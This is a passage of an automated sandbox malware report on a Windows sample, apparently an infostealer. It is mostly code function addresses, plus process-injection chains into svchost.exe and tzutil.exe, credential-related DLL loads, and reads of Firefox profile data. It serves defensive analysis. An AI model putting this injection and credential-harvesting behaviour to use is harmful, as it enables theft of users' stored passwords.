                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402B66
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416B0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416B13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00410383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E4D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E4D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040274A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E1AA37_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EDAC67_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFA497_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F7A467_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B3A6C7_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D59107_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039499507_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395B9507_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039438E07_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AD8007_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03941F927_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFFB17_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03903FD27_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03903FD57_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFF097_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03949EB07_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395FDC07_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F1D5A7_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03943D407_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F7D737_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFCF27_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B9C327_2_039B9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393E3F011_2_0393E3F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F03E611_2_039F03E6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EA35211_2_039EA352
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039B02C011_2_039B02C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D027411_2_039D0274
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F01AA11_2_039F01AA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E41A211_2_039E41A2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E81CC11_2_039E81CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CA11811_2_039CA118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392010011_2_03920100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039B815811_2_039B8158
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039C200011_2_039C2000
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392C7C011_2_0392C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0395475011_2_03954750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393077011_2_03930770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394C6E011_2_0394C6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F059111_2_039F0591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393053511_2_03930535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039DE4F611_2_039DE4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D442011_2_039D4420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E244611_2_039E2446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E6BD711_2_039E6BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EAB4011_2_039EAB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392EA8011_2_0392EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039329A011_2_039329A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039FA9A611_2_039FA9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394696211_2_03946962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039168B811_2_039168B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0395E8F011_2_0395E8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393A84011_2_0393A840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393284011_2_03932840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039AEFA011_2_039AEFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03922FC811_2_03922FC8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393CFE011_2_0393CFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03950F3011_2_03950F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D2F3011_2_039D2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03972F2811_2_03972F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A4F4011_2_039A4F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03942E9011_2_03942E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039ECE9311_2_039ECE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EEEDB11_2_039EEEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EEE2611_2_039EEE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03930E5911_2_03930E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03948DBF11_2_03948DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392ADE011_2_0392ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CCD1F11_2_039CCD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393AD0011_2_0393AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D0CB511_2_039D0CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03920CF211_2_03920CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03930C0011_2_03930C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0397739A11_2_0397739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E132D11_2_039E132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0391D34C11_2_0391D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039352A011_2_039352A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394B2C011_2_0394B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D12ED11_2_039D12ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393B1B011_2_0393B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0391F17211_2_0391F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039FB16B11_2_039FB16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0396516C11_2_0396516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039DF0CC11_2_039DF0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039370C011_2_039370C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E70E911_2_039E70E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EF0E011_2_039EF0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EF7B011_2_039EF7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E16CC11_2_039E16CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0397563011_2_03975630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CD5B011_2_039CD5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F95C311_2_039F95C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E757111_2_039E7571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EF43F11_2_039EF43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392146011_2_03921460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394FB8011_2_0394FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A5BF011_2_039A5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0396DBF911_2_0396DBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFB7611_2_039EFB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CDAAC11_2_039CDAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03975AA011_2_03975AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D1AA311_2_039D1AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039DDAC611_2_039DDAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFA4911_2_039EFA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E7A4611_2_039E7A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A3A6C11_2_039A3A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039C591011_2_039C5910
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393995011_2_03939950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394B95011_2_0394B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039338E011_2_039338E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0399D80011_2_0399D800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03931F9211_2_03931F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFFB111_2_039EFFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F3FD511_2_038F3FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F3FD211_2_038F3FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFF0911_2_039EFF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03939EB011_2_03939EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394FDC011_2_0394FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E1D5A11_2_039E1D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03933D4011_2_03933D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E7D7311_2_039E7D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFCF211_2_039EFCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A9C3211_2_039A9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A1FA011_2_030A1FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309CEA011_2_0309CEA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309B20E11_2_0309B20E
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309B21011_2_0309B210
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309B0C011_2_0309B0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309D0C011_2_0309D0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A564011_2_030A5640
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A384B11_2_030A384B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A385011_2_030A3850
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030BBDC011_2_030BBDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DE2E511_2_036DE2E5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DE79F11_2_036DE79F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DE40611_2_036DE406
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DCB0311_2_036DCB03
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DD86811_2_036DD868
Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: String function: 00910AE3 appears 70 times
Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: String function: 008F7DE1 appears 35 times
Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: String function: 00918900 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 111 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 0391B970 appears 277 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 03965130 appears 58 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 0399EA12 appears 86 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 03977E54 appears 111 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 039AF290 appears 105 times
                Source: 01152-11-12-24.exe, 00000000.00000003.1279379840.0000000003B33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 01152-11-12-24.exe
                Source: 01152-11-12-24.exe, 00000000.00000003.1281036561.0000000003CDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 01152-11-12-24.exe
                Source: 01152-11-12-24.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@12/7
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095A06A GetLastError,FormatMessageW,0_2_0095A06A
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009481CB AdjustTokenPrivileges,CloseHandle,0_2_009481CB
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009487E1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0095B3FB
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0096EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0096EE0D
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0095C397
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008F4E89
                Source: C:\Users\user\Desktop\01152-11-12-24.exeFile created: C:\Users\user~1\AppData\Local\Temp\autC19E.tmpJump to behavior
                Source: 01152-11-12-24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tzutil.exe, 0000000B.00000003.1910572867.0000000003323000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1910572867.0000000003344000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1910465448.0000000003359000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3115425477.0000000003379000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3115425477.0000000003344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 01152-11-12-24.exeReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Users\user\Desktop\01152-11-12-24.exe "C:\Users\user\Desktop\01152-11-12-24.exe"
                Source: C:\Users\user\Desktop\01152-11-12-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\01152-11-12-24.exe"
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\01152-11-12-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\01152-11-12-24.exe"Jump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: dnsapi.dllJump to behavior
